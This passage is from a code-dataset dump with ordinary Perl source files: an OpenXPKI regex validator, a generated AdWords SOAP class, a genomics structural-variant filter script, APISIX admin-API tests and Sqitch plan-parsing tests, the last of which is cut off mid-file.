Dataset schema (one row per source file; "⌀" marks nullable columns):

column | type | range
---|---|---
hexsha | string | length 40
size | int64 | 3 - 1.05M
ext | string | 163 classes
lang | string | 53 classes
max_stars_repo_path | string | length 3 - 945
max_stars_repo_name | string | length 4 - 112
max_stars_repo_head_hexsha | string | length 40 - 78
max_stars_repo_licenses | list | length 1 - 10
max_stars_count | float64 | 1 - 191k ⌀
max_stars_repo_stars_event_min_datetime | string | length 24 ⌀
max_stars_repo_stars_event_max_datetime | string | length 24 ⌀
max_issues_repo_path | string | length 3 - 945
max_issues_repo_name | string | length 4 - 113
max_issues_repo_head_hexsha | string | length 40 - 78
max_issues_repo_licenses | list | length 1 - 10
max_issues_count | float64 | 1 - 116k ⌀
max_issues_repo_issues_event_min_datetime | string | length 24 ⌀
max_issues_repo_issues_event_max_datetime | string | length 24 ⌀
max_forks_repo_path | string | length 3 - 945
max_forks_repo_name | string | length 4 - 113
max_forks_repo_head_hexsha | string | length 40 - 78
max_forks_repo_licenses | list | length 1 - 10
max_forks_count | float64 | 1 - 105k ⌀
max_forks_repo_forks_event_min_datetime | string | length 24 ⌀
max_forks_repo_forks_event_max_datetime | string | length 24 ⌀
content | string | length 3 - 1.05M
avg_line_length | float64 | 1 - 966k
max_line_length | int64 | 1 - 977k
alphanum_fraction | float64 | 0 - 1
hexsha ed7e5693498fbd8033d2f0f8f03b928506778a21 | size 4,517 | ext pm | lang Perl
repo cwittmer/openxpki @ adf205de4b79e896147e1f5572f447c884f36d32 | path core/server/OpenXPKI/Server/Workflow/Validator/Regex.pm | licenses ["Apache-2.0"] (identical for the stars/issues/forks columns)
stars null | issues null | forks 1 (2019-10-04T16:01:45.000Z)

package OpenXPKI::Server::Workflow::Validator::Regex;
use strict;
use warnings;
use base qw( Workflow::Validator );
use OpenXPKI::Debug;
use Data::Dumper;
use OpenXPKI::Server::Context qw( CTX );
use Workflow::Exception qw( validation_error );
use OpenXPKI::Serialization::Simple;
__PACKAGE__->mk_accessors(qw(regex error modifier));
sub _init {
my ( $self, $params ) = @_;
$self->regex( $params->{regex} ) if ($params->{regex});
# Default modifier is /xi
$self->modifier( $params->{modifier} ? $params->{modifier} : 'xi') ;
$self->error( 'I18N_OPENXPKI_UI_VALIDATOR_REGEX_FAILED' );
$self->error( $params->{error} ) if ($params->{error});
}
sub validate {
my ( $self, $wf, $value, $regex, $modifier ) = @_;
##! 1: 'start'
if (!defined $value || $value eq '') {
CTX('log')->log(
MESSAGE => "Regex validator skipped - value is empty",
PRIORITY => 'info',
FACILITY => 'application',
);
return 1;
}
$regex = $self->regex() unless($regex);
$modifier = $self->modifier() unless($modifier);
##! 16: 'Value ' . Dumper $value
##! 16: 'Regex ' . $regex
# replace named regexes
if ($regex eq 'email') {
$regex = qr/ \A [a-z0-9\.-]+\@([\w_-]+\.)+(\w+) \z /xi;
} elsif ($regex eq 'fqdn') {
$regex = qr/ \A (([\w\-]+\.)+)[\w\-]{2,} \z /xi;
# or quote the string if no named match
} else {
# Extended Pattern notation, see http://perldoc.perl.org/perlre.html#Extended-Patterns
$modifier =~ s/\s//g;
if ($modifier =~ /[^alupimsx]/ ) {
OpenXPKI::Exception->throw(
message => "I18N_OPENXPKI_VALIDATOR_REGEX_INVALID_MODIFIER",
params => {
MODIFIER => $modifier,
},
);
}
$modifier = "(?$modifier)" if ($modifier);
$regex = qr{$modifier$regex};
}
# Array Magic
my @errors;
##! 32: 'ref of value ' . ref $value
if (ref $value eq 'ARRAY' || $value =~ /^ARRAY/) {
##! 8: 'Array mode'
if (!ref $value) {
$value = OpenXPKI::Serialization::Simple->new()->deserialize( $value );
}
foreach my $val (@{$value}) {
# skip empty
next if (!defined $val || $val eq '');
##! 8: 'Failed on ' . $val
push @errors, $val if ($val !~ $regex);
}
} else {
##! 8: 'scalar mode'
push @errors, $value if ($value !~ $regex);
}
if (@errors) {
# Need to implement this in New UI first
#$wf->context()->param( '__error' => [ $self->error(), { FIELD => $field, VALUES => \@errors }]);
##! 32: 'Regex errors with regex ' . $regex. ', values ' . Dumper \@errors
CTX('log')->log(
MESSAGE => "Regex validator failed on regex $regex",
PRIORITY => 'error',
FACILITY => 'application',
);
my @fields_with_error = ({ name => 'link', error => $self->error() });
validation_error( $self->error(), { invalid_fields => \@fields_with_error } );
return 0;
}
return 1;
}
1;
=head1 NAME
OpenXPKI::Server::Workflow::Validator::Regex
=head1 SYNOPSIS
class: OpenXPKI::Server::Workflow::Validator::Regex
arg:
- $link
param:
regex: "\\A http(s)?://[a-zA-Z0-9-\\.]+"
modifier: xi
error: Please provide a well-formed URL starting with http://
=head1 DESCRIPTION
Validates the context value referenced by argument against a regex. The regex
can be passed either as second argument or specified in the param section.
The value given as argument is always preferred.
class: OpenXPKI::Server::Workflow::Validator::Regex
arg:
- $link
- email
The error parameter is optional; if set, it is shown in the UI instead of the
default message when the validator fails.
The regex must be given as a pattern without delimiters or modifiers. The
default modifier is "xi" (extended pattern syntax, case-insensitive); you can
override it using the key "modifier" in the param section (see
http://perldoc.perl.org/perlre.html#Modifiers).
Some common formats can also be referenced by name:
=over
=item email
Basic check for valid email syntax
=item fqdn
A fully qualified domain name; it must have at least one dot, all "word"
characters are accepted for the domain parts, and the last domain part must
have at least two characters.
=back
avg_line_length 29.141935 | max_line_length 105 | alphanum_fraction 0.572725

hexsha eda86af3cf8702edf0dfc65f59d3ceae02b2e6a6 | size 1,677 | ext pm | lang Perl
repo gitpan/Google-Ads-AdWords-Client @ 44c7408a1b7f8f16b22efa359c037d1f986f04f1 | path lib/Google/Ads/AdWords/v201406/FeedItemCampaignTargeting.pm | licenses ["Apache-2.0"] (identical for the stars/issues/forks columns)
stars null | issues null | forks null

package Google::Ads::AdWords::v201406::FeedItemCampaignTargeting;
use strict;
use warnings;
__PACKAGE__->_set_element_form_qualified(1);
sub get_xmlns { 'https://adwords.google.com/api/adwords/cm/v201406' };
our $XML_ATTRIBUTE_CLASS;
undef $XML_ATTRIBUTE_CLASS;
sub __get_attr_class {
return $XML_ATTRIBUTE_CLASS;
}
use Class::Std::Fast::Storable constructor => 'none';
use base qw(Google::Ads::SOAP::Typelib::ComplexType);
{ # BLOCK to scope variables
my %TargetingCampaignId_of :ATTR(:get<TargetingCampaignId>);
__PACKAGE__->_factory(
[ qw( TargetingCampaignId
) ],
{
'TargetingCampaignId' => \%TargetingCampaignId_of,
},
{
'TargetingCampaignId' => 'SOAP::WSDL::XSD::Typelib::Builtin::long',
},
{
'TargetingCampaignId' => 'TargetingCampaignId',
}
);
} # end BLOCK
1;
=pod
=head1 NAME
Google::Ads::AdWords::v201406::FeedItemCampaignTargeting
=head1 DESCRIPTION
Perl data type class for the XML Schema defined complexType
FeedItemCampaignTargeting from the namespace https://adwords.google.com/api/adwords/cm/v201406.
Specifies the campaign the request context must match in order for the feed item to be considered eligible for serving (aka the targeted campaign). E.g., if the below campaign targeting is set to campaignId = X, then the feed item can only serve under campaign X.
=head2 PROPERTIES
The following properties may be accessed using get_PROPERTY / set_PROPERTY
methods:
=over
=item * TargetingCampaignId
=back
=head1 METHODS
=head2 new
Constructor. The following data structure may be passed to new():
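The generated structure is not reproduced here; as a sketch based on the
single TargetingCampaignId property (a SOAP long), it would look like the
following, where $some_value is a placeholder:
 { # Google::Ads::AdWords::v201406::FeedItemCampaignTargeting
   TargetingCampaignId => $some_value, # long
 },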
=head1 AUTHOR
Generated by SOAP::WSDL
=cut
avg_line_length 16.939394 | max_line_length 264 | alphanum_fraction 0.726893

hexsha ed7a3e228e29c32ac3ee2f97231285d66a882a24 | size 5,701 | ext pl | lang Perl
repo jeff-sc-chu/AVVA @ 9ea97a0d2ba6c814b49dda963cbe65d021eadcda | path avva_filter.pl | licenses ["MIT"] (identical for the stars/issues/forks columns)
stars null | issues null | forks null

use strict;
use Getopt::Std;
sub help_mess{
print "\n", "Filter SV events from AVVA", "\n";
print "\n";
print "\t", "-T <Int>", "\t", "Task: ", "\n";
print "\t", "", "\t", "FilterRefContig:\tFilter restuls of Categorize with a reference event set", "\n";
print "\t", "", "\t", "FilterGap:\tFilter events bordering gaps", "\n";
print "\t", "", "\t", "FilterVCF:\tFilter with a Illumina/PacBio Call set", "\n";
print "\t", "-i <File>", "\t", "Output file from avva.pl to be filtered", "\n";
print "\t", "-j <File>", "\t", "Output file from avva.pl to be used a reference", "\n";
print "\t", "-g <File>", "\t", "GapInfo file", "\n";
print "\t", "-k [Bool]", "\t", "Keep filtered results (1) or remove filtered results (default, or 0).", "\n";
print "\t", "-h [Bool]", "\t", "Help. Show this and exits.", "\n";
}
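# Example invocation (a sketch; the data file names below are placeholders,
# not files shipped with AVVA): drop events that border assembly gaps.
#
#   perl avva_filter.pl -T FilterGap -i avva_output.txt -g gapinfo.txt -o filtered.txt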
## ARGS #############
my %options;
my $arguments = 'i:o:T:r:j:e:g:c:k8hp';
getopts($arguments, \%options);
my $_input = $options{'i'};
my $_output = $options{'o'};
my $_tasks = $options{'T'};
my $_debug = $options{'8'};
my $_help = $options{'h'};
my $_refFile = $options{'j'};
my $_gapInfoFile = $options{'g'};
my $_keepFilter = $options{'k'};
%options = ();
if($_help){
help_mess();
exit;
}
if(!$_output){
open OUT, ">&STDOUT";
}
else{
open OUT, "+>$_output";
}
die "Error: Required input (-i) missing.\n" if(!$_input);
## Globals #############
my %gap;
my %ref;
## Main #############
if($_tasks eq 'FilterRefContig'){
die "Error: Required ref set (-j) missing.\n" if(!$_refFile);
FilterRefContig();
}
elsif($_tasks eq 'FilterGap'){
if(!$_gapInfoFile){
help_mess();
print STDERR "Error: Required GapInfo file (-g) missing.\n";
exit;
}
populateGap();
FilterGap();
}
elsif($_tasks eq 'FilterVCF'){
die "Error: Required VCF input (-j) missing.\n" if(!$_refFile);
populateVCF();
FilterVCF();
}
else{
help_mess();
print STDERR "Error: Unknown Task.\n";
exit;
}
## Subroutines
sub FilterVCF{
open IN, $_input;
while(my $line = <IN>){
chomp $line;
my @info = split /\t/, $line;
my ($category, $eventPosLine) = ($info[1], $info[4]);
#my ($contig, $category, $eventCount, $events, $eventPosLine) = split /\t/, $line;
next if($category eq 'Contiguous');
my $support = '';
my @eventPos = split /;/, $eventPosLine;
foreach my $eventPos(@eventPos){
my $supportStatus = 0;
my ($chr1, $pos1, $chr2, $pos2) = $eventPos =~ /(\S+):(\d+)-(\S+):(\d+)/;
for(my $i = $pos1-1000; $i <= $pos1+1000; $i++){
if($ref{$chr1}{$i}){
$support .= 'S';
$supportStatus = 1;
last;
}
}
if(!$supportStatus){
for(my $i = $pos2-1000; $i <= $pos2+1000; $i++){
if($ref{$chr2}{$i}){
$support .= 'S';
$supportStatus = 1;
last;
}
}
}
if(!$supportStatus){
$support .= 'x';
}
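# The exact-position check below is disabled with POD markers (=cut ... =cut);
# the +/-1000 bp window scan above is used instead.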
=cut
if($ref{$chr1}{$pos1} || $ref{$chr2}{$pos2}){
$support .= 'S';
}
else{
$support .= 'x';
}
=cut
}
if($_keepFilter){
print $line, "\t", $support, "\n";
}
else{
print $line, "\t", $support, "\n" if $support =~ /x/;
}
}
close IN;
}
sub FilterGap{
open IN, $_input;
while(my $line = <IN>){
chomp $line;
my ($contig, $category, $eventCount, $events, $eventPosLine) = split /\t/, $line;
next if($category eq 'Contiguous');
my $borderGap = '';
my @eventPos = split /;/, $eventPosLine;
foreach my $eventPos(@eventPos){
my ($chr1, $pos1, $chr2, $pos2) = $eventPos =~ /(\S+):(\d+)-(\S+):(\d+)/;
if($gap{$chr1}{$pos1} || $gap{$chr2}{$pos2}){
$borderGap .= 'G';
}
else{
$borderGap .= 'n';
}
}
print $line, "\t$borderGap\n" if $borderGap =~ /n/;
}
close IN;
}
sub FilterRefContig{
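# Mark each breakpoint of an event 'C' if it lies within +/-1000 bp of a
# breakpoint in the reference set (-j), otherwise 'n'; only events with at
# least one unmatched breakpoint are printed.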
my %ref;
open REF, $_refFile;
while(my $line = <REF>){
chomp $line;
my ($contig, $category, $eventCount, $events, $eventPosLine) = split /\t/, $line;
next if($category eq 'Contiguous');
my @eventPos = split /;/, $eventPosLine;
foreach my $eventPos(@eventPos){
my ($chr1, $pos1, $chr2, $pos2) = $eventPos =~ /(\S+):(\d+)-(\S+):(\d+)/;
for(my $i = $pos1 - 1000; $i < $pos1 + 1000; $i++){
$ref{$chr1}{$i} = 1;
}
for(my $i = $pos2 - 1000; $i < $pos2 + 1000; $i++){
$ref{$chr2}{$i} = 1;
}
}
}
close REF;
open IN, $_input;
while(my $line = <IN>){
chomp $line;
my $control;
my ($contig, $category, $eventCount, $events, $eventPosLine) = split /\t/, $line;
next if($category eq 'Contiguous');
my @eventPos = split /;/, $eventPosLine;
foreach my $eventPos(@eventPos){
my ($chr1, $pos1, $chr2, $pos2) = $eventPos =~ /(\S+):(\d+)-(\S+):(\d+)/;
if($ref{$chr1}{$pos1} || $ref{$chr2}{$pos2}){
$control .= 'C';
}
else{
$control .= 'n';
}
}
print $line, "\t", $control, "\n" if $control =~ /n/;
}
close IN;
}
sub populateGap{
open GAP, $_gapInfoFile;
while(my $line = <GAP>){
chomp $line;
my ($chrom, $gapS, $gapE) = $line =~ /^(\S+):(\d+)-(\d+)/;
for(my $i = $gapS - 50; $i <= $gapS; $i++){
$gap{$chrom}{$i} = 1;
}
for(my $i = $gapE; $i <= $gapE + 50; $i++){
$gap{$chrom}{$i} = 1;
}
}
close GAP;
}
sub populateVCF{
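# Index breakpoint positions from the VCF call set (-j): record POS and END
# (when present), and for BND records parse the mate position from the ALT
# column (assumes chromosome names of the form "ChromN").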
open REF, $_refFile;
while(my $line = <REF>){
chomp $line;
next if($line =~ /^#/);
my @info = split /\t/, $line;
my ($svType) = $line =~ /SVTYPE=(.*?);/;
my ($end) = $line =~ /END=(\d+)/;
$end = 0 if !$end;
my $endChr = $info[0];
if($svType eq "BND"){
($endChr, $end) = $info[4] =~ /(Chrom\d+):(\d+)/;
}
$ref{$info[0]}{$info[1]} = 1;
if($end){
$ref{$endChr}{$end} = 1;
}
}
close REF;
}
avg_line_length 25.68018 | max_line_length 111 | alphanum_fraction 0.512366

hexsha eda7671934ee4a435a508822c45dd0b4a0257d62 | size 3,370 | ext t | lang Perl | path t/admin/consumers2.t
stars: syzh/apisix @ c8d35cd73c1c02b7c5f98f14042f9467f40a632f | ["Apache-2.0"] | null
issues: syzh/apisix @ c8d35cd73c1c02b7c5f98f14042f9467f40a632f | ["Apache-2.0"] | 2 (2022-02-28T01:28:56.000Z to 2022-03-01T01:47:55.000Z)
forks: wfgydbu/apisix @ e02baebbef0268114d93474e41b1e7ed7f59e957 | ["Apache-2.0"] | null

#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
use t::APISIX 'no_plan';
repeat_each(1);
no_long_string();
no_root_location();
no_shuffle();
log_level("info");
add_block_preprocessor(sub {
my ($block) = @_;
if (!$block->request) {
$block->set_value("request", "GET /t");
}
if (!$block->no_error_log) {
$block->set_value("no_error_log", "[error]\n[alert]");
}
});
run_tests;
__DATA__
=== TEST 1: not unwanted data, PUT
--- config
location /t {
content_by_lua_block {
local json = require("toolkit.json")
local t = require("lib.test_admin").test
local code, message, res = t('/apisix/admin/consumers',
ngx.HTTP_PUT,
[[{
"username":"jack"
}]]
)
if code >= 300 then
ngx.status = code
ngx.say(message)
return
end
res = json.decode(res)
res.node.value.create_time = nil
res.node.value.update_time = nil
ngx.say(json.encode(res))
}
}
--- response_body
{"action":"set","node":{"key":"/apisix/consumers/jack","value":{"username":"jack"}}}
=== TEST 2: not unwanted data, GET
--- config
location /t {
content_by_lua_block {
local json = require("toolkit.json")
local t = require("lib.test_admin").test
local code, message, res = t('/apisix/admin/consumers/jack',
ngx.HTTP_GET
)
if code >= 300 then
ngx.status = code
ngx.say(message)
return
end
res = json.decode(res)
res.node.value.create_time = nil
res.node.value.update_time = nil
ngx.say(json.encode(res))
}
}
--- response_body
{"action":"get","count":"1","node":{"key":"/apisix/consumers/jack","value":{"username":"jack"}}}
=== TEST 3: not unwanted data, DELETE
--- config
location /t {
content_by_lua_block {
local json = require("toolkit.json")
local t = require("lib.test_admin").test
local code, message, res = t('/apisix/admin/consumers/jack',
ngx.HTTP_DELETE
)
if code >= 300 then
ngx.status = code
ngx.say(message)
return
end
res = json.decode(res)
ngx.say(json.encode(res))
}
}
--- response_body
{"action":"delete","deleted":"1","key":"/apisix/consumers/jack","node":{}}
avg_line_length 27.398374 | max_line_length 96 | alphanum_fraction 0.565579

hexsha ed9983922e6ecf3c3d0597880d2cb257967c111c | size 80,179 | ext t | lang Perl
repo AndreSteenveld/sqitch @ a2c920545cdba64367c88b77a6268b0fc503f0d3 | path t/plan.t | licenses ["MIT"] (identical for the stars/issues/forks columns)
stars null | issues null | forks 1 (2021-09-27T15:57:36.000Z)

#!/usr/bin/perl -w
use strict;
use warnings;
use 5.010;
use utf8;
use Test::More;
use App::Sqitch;
use App::Sqitch::Target;
use Locale::TextDomain qw(App-Sqitch);
use Path::Class;
use Test::Exception;
use Test::File;
use Test::Deep;
use Test::File::Contents;
use Encode;
#use Test::NoWarnings;
use File::Path qw(make_path remove_tree);
use App::Sqitch::DateTime;
use lib 't/lib';
use MockOutput;
use TestConfig;
my $CLASS;
BEGIN {
$CLASS = 'App::Sqitch::Plan';
use_ok $CLASS or die;
}
can_ok $CLASS, qw(
sqitch
target
file
changes
position
load
syntax_version
project
uri
_parse
check_changes
open_script
);
my $config = TestConfig->new('core.engine' => 'sqlite');
my $sqitch = App::Sqitch->new( config => $config );
my $target = App::Sqitch::Target->new( sqitch => $sqitch );
isa_ok my $plan = App::Sqitch::Plan->new(sqitch => $sqitch, target => $target),
$CLASS;
is $plan->file, $target->plan_file, 'File should be copied from Target';
# Set up some utility functions for creating changes.
sub blank {
App::Sqitch::Plan::Blank->new(
plan => $plan,
lspace => $_[0] // '',
note => $_[1] // '',
);
}
my $prev_tag;
my $prev_change;
my %seen;
sub clear {
undef $prev_tag;
undef $prev_change;
%seen = ();
return ();
}
my $ts = App::Sqitch::DateTime->new(
year => 2012,
month => 7,
day => 16,
hour => 17,
minute => 25,
second => 7,
time_zone => 'UTC',
);
sub ts($) {
my $str = shift || return $ts;
my @parts = split /[-:T]/ => $str;
return App::Sqitch::DateTime->new(
year => $parts[0],
month => $parts[1],
day => $parts[2],
hour => $parts[3],
minute => $parts[4],
second => $parts[5],
time_zone => 'UTC',
);
}
my $vivify = 0;
my $project;
sub dep($) {
App::Sqitch::Plan::Depend->new(
plan => $plan,
(defined $project ? (project => $project) : ()),
%{ App::Sqitch::Plan::Depend->parse(shift) },
)
}
sub change($) {
my $p = shift;
if ( my $op = delete $p->{op} ) {
@{ $p }{ qw(lopspace operator ropspace) } = split /([+-])/, $op;
$p->{$_} //= '' for qw(lopspace ropspace);
}
$p->{requires} = [ map { dep $_ } @{ $p->{requires} } ]
if $p->{requires};
$p->{conflicts} = [ map { dep "!$_" } @{ $p->{conflicts} }]
if $p->{conflicts};
$prev_change = App::Sqitch::Plan::Change->new(
plan => $plan,
timestamp => ts delete $p->{ts},
planner_name => 'Barack Obama',
planner_email => 'potus@whitehouse.gov',
( $prev_tag ? ( since_tag => $prev_tag ) : () ),
( $prev_change ? ( parent => $prev_change ) : () ),
%{ $p },
);
if (my $duped = $seen{ $p->{name} }) {
$duped->add_rework_tags(map { $seen{$_}-> tags } @{ $p->{rtag} });
}
$seen{ $p->{name} } = $prev_change;
if ($vivify) {
$prev_change->id;
$prev_change->tags;
}
return $prev_change;
}
sub tag($) {
my $p = shift;
my $ret = delete $p->{ret};
$prev_tag = App::Sqitch::Plan::Tag->new(
plan => $plan,
change => $prev_change,
timestamp => ts delete $p->{ts},
planner_name => 'Barack Obama',
planner_email => 'potus@whitehouse.gov',
%{ $p },
);
$prev_change->add_tag($prev_tag);
$prev_tag->id, if $vivify;
return $ret ? $prev_tag : ();
}
sub prag {
App::Sqitch::Plan::Pragma->new(
plan => $plan,
lspace => $_[0] // '',
hspace => $_[1] // '',
name => $_[2],
(defined $_[3] ? (lopspace => $_[3]) : ()),
(defined $_[4] ? (operator => $_[4]) : ()),
(defined $_[5] ? (ropspace => $_[5]) : ()),
(defined $_[6] ? (value => $_[6]) : ()),
rspace => $_[7] // '',
note => $_[8] // '',
);
}
my $mocker = Test::MockModule->new($CLASS);
# Do no sorting for now.
my $sorted = 0;
sub sorted () {
my $ret = $sorted;
$sorted = 0;
return $ret;
}
$mocker->mock(check_changes => sub { $sorted++; shift, shift, shift; @_ });
sub version () {
prag(
'', '', 'syntax-version', '', '=', '', App::Sqitch::Plan::SYNTAX_VERSION
);
}
##############################################################################
# Test parsing.
my $file = file qw(t plans widgets.plan);
my $fh = $file->open('<:utf8_strict');
ok my $parsed = $plan->_parse($file, $fh),
'Should parse simple "widgets.plan"';
is sorted, 1, 'Should have sorted changes';
isa_ok $parsed->{changes}, 'ARRAY', 'changes';
isa_ok $parsed->{lines}, 'ARRAY', 'lines';
cmp_deeply $parsed->{changes}, [
clear,
change { name => 'hey', ts => '2012-07-16T14:01:20' },
change { name => 'you', ts => '2012-07-16T14:01:35' },
tag {
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T14:02:05',
rspace => ' '
},
], 'All "widgets.plan" changes should be parsed';
cmp_deeply $parsed->{lines}, [
clear,
version,
prag( '', '', 'project', '', '=', '', 'widgets'),
blank('', 'This is a note'),
blank(),
blank(' ', 'And there was a blank line.'),
blank(),
change { name => 'hey', ts => '2012-07-16T14:01:20' },
change { name => 'you', ts => '2012-07-16T14:01:35' },
tag {
ret => 1,
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T14:02:05',
rspace => ' '
},
], 'All "widgets.plan" lines should be parsed';
# Plan with multiple tags.
$file = file qw(t plans multi.plan);
$fh = $file->open('<:utf8_strict');
ok $parsed = $plan->_parse($file, $fh),
'Should parse multi-tagged "multi.plan"';
is sorted, 2, 'Should have sorted changes twice';
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
project => 'multi',
}, 'Should have captured the multi pragmas';
cmp_deeply $parsed, {
changes => [
clear,
change { name => 'hey', planner_name => 'theory', planner_email => 't@heo.ry' },
change { name => 'you', planner_name => 'anna', planner_email => 'a@n.na' },
tag {
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T17:24:07',
rspace => ' ',
planner_name => 'julie',
planner_email => 'j@ul.ie',
},
change { name => 'this/rocks', pspace => ' ' },
change { name => 'hey-there', note => 'trailing note!', rspace => ' ' },
tag { name =>, 'bar' },
tag { name => 'baz' },
],
lines => [
clear,
version,
prag( '', '', 'project', '', '=', '', 'multi'),
blank('', 'This is a note'),
blank(),
blank('', 'And there was a blank line.'),
blank(),
change { name => 'hey', planner_name => 'theory', planner_email => 't@heo.ry' },
change { name => 'you', planner_name => 'anna', planner_email => 'a@n.na' },
tag {
ret => 1,
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T17:24:07',
rspace => ' ',
planner_name => 'julie',
planner_email => 'j@ul.ie',
},
blank(' '),
change { name => 'this/rocks', pspace => ' ' },
change { name => 'hey-there', note => 'trailing note!', rspace => ' ' },
tag { name =>, 'bar', ret => 1 },
tag { name => 'baz', ret => 1 },
],
}, 'Should have "multi.plan" lines and changes';
# Try a plan with changes appearing without a tag.
$file = file qw(t plans changes-only.plan);
$fh = $file->open('<:utf8_strict');
ok $parsed = $plan->_parse($file, $fh), 'Should read plan with no tags';
is sorted, 1, 'Should have sorted changes';
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
project => 'changes_only',
}, 'Should have captured the changes-only pragmas';
cmp_deeply $parsed, {
lines => [
clear,
version,
prag( '', '', 'project', '', '=', '', 'changes_only'),
blank('', 'This is a note'),
blank(),
blank('', 'And there was a blank line.'),
blank(),
change { name => 'hey' },
change { name => 'you' },
change { name => 'whatwhatwhat' },
],
changes => [
clear,
change { name => 'hey' },
change { name => 'you' },
change { name => 'whatwhatwhat' },
],
}, 'Should have lines and changes for tagless plan';
# Try plans with DOS line endings.
$file = file qw(t plans dos.plan);
$fh = $file->open('<:utf8_strict');
ok $parsed = $plan->_parse($file, $fh), 'Should read plan with DOS line endings';
is sorted, 1, 'Should have sorted changes';
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
project => 'dos',
}, 'Should have captured the dos pragmas';
# Try a plan with a bad change name.
$file = file qw(t plans bad-change.plan);
$fh = $file->open('<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on plan with bad change name';
is $@->ident, 'parse', 'Bad change name error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 5,
error => __(
qq{Invalid name; names must not begin with punctuation, }
. 'contain "@", ":", "#", or blanks, or end in punctuation or digits following punctuation',
),
), 'And the bad change name error message should be correct';
is sorted, 0, 'Should not have sorted changes';
my @bad_names = (
'^foo', # No leading punctuation
'foo^', # No trailing punctuation
'foo^6', # No trailing punctuation+digit
'foo^666', # No trailing punctuation+digits
'%hi', # No leading punctuation
'hi!', # No trailing punctuation
'foo@bar', # No @ allowed at all
'foo:bar', # No : allowed at all
'+foo', # No leading +
'-foo', # No leading -
'@foo', # No leading @
);
# Try other invalid change and tag name issues.
my $prags = '%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION
. "\n%project=test\n\n";
for my $name (@bad_names) {
for my $line ("+$name", "\@$name") {
next if $line eq '%hi'; # This would be a pragma.
my $buf = $prags . $line;
my $what = $line =~ /^[@]/ ? 'tag' : 'change';
my $fh = IO::File->new(\$buf, '<:utf8_strict');
throws_ok { $plan->_parse('baditem', $fh) } 'App::Sqitch::X',
qq{Should die on plan with bad name "$line"};
is $@->ident, 'parse', 'Exception ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => 'baditem',
lineno => 4,
error => __(
qq{Invalid name; names must not begin with punctuation, }
. 'contain "@", ":", "#", or blanks, or end in punctuation or digits following punctuation',
)
), qq{And "$line" should trigger the appropriate message};
is sorted, 0, 'Should not have sorted changes';
}
}
# Try some valid change and tag names.
my $tsnp = '2012-07-16T17:25:07Z Barack Obama <potus@whitehouse.gov>';
my $foo_proj = App::Sqitch::Plan::Pragma->new(
plan => $plan,
name => 'project',
value => 'foo',
operator => '=',
);
for my $name (
'foo', # alpha
'12', # digits
't', # char
'6', # digit
'阱阪阬', # multibyte
'foo/bar', # middle punct
'beta1', # ending digit
'foo_', # ending underscore
'_foo', # leading underscore
'v1.0-1b', # punctuation followed by digit in middle
'v1.2-1', # version number with dash
'v1.2+1', # version number with plus
'v1.2_1', # version number with underscore
) {
# Test a change name.
my $lines = encode_utf8 "\%project=foo\n\n$name $tsnp";
my $fh = IO::File->new(\$lines, '<:utf8_strict');
ok my $parsed = $plan->_parse('ooditem', $fh),
encode_utf8(qq{Should parse "$name"});
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
project => 'foo',
}, encode_utf8("Should have captured the $name pragmas");
cmp_deeply $parsed, {
changes => [ clear, change { name => $name } ],
lines => [ clear, version, $foo_proj, blank, change { name => $name } ],
}, encode_utf8(qq{Should have pragmas in plan with change "$name"});
# Test a tag name.
my $tag = '@' . $name;
$lines = encode_utf8 "\%project=foo\n\nfoo $tsnp\n$tag $tsnp";
$fh = IO::File->new(\$lines, '<:utf8_strict');
ok $parsed = $plan->_parse('gooditem', $fh),
encode_utf8(qq{Should parse "$tag"});
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
project => 'foo',
}, encode_utf8(qq{Should have pragmas in plan with tag "$name"});
cmp_deeply $parsed, {
changes => [ clear, change { name => 'foo' }, tag { name => $name } ],
lines => [
clear,
version,
$foo_proj,
blank,
change { name => 'foo' },
tag { name => $name, ret => 1 }
],
}, encode_utf8(qq{Should have line and change for "$tag"});
}
is sorted, 26, 'Should have sorted changes 26 times';
# Try planning with other reserved names.
for my $reserved (qw(HEAD ROOT)) {
my $root = $prags . '@' . $reserved . " $tsnp";
$file = file qw(t plans), "$reserved.plan";
$fh = IO::File->new(\$root, '<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
qq{Should die on plan with reserved tag "\@$reserved"};
is $@->ident, 'parse', qq{\@$reserved exception should have ident "plan"};
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 4,
error => __x(
'"{name}" is a reserved name',
name => '@' . $reserved,
),
), qq{And the \@$reserved error message should be correct};
is sorted, 0, "Should have sorted \@$reserved changes nonce";
}
# Try a plan with a change name that looks like a sha1 hash.
my $sha1 = '6c2f28d125aff1deea615f8de774599acf39a7a1';
$file = file qw(t plans sha1.plan);
$fh = IO::File->new(\"$prags$sha1 $tsnp", '<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on plan with SHA1 change name';
is $@->ident, 'parse', 'The SHA1 error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 4,
error => __x(
'"{name}" is invalid because it could be confused with a SHA1 ID',
name => $sha1,
),
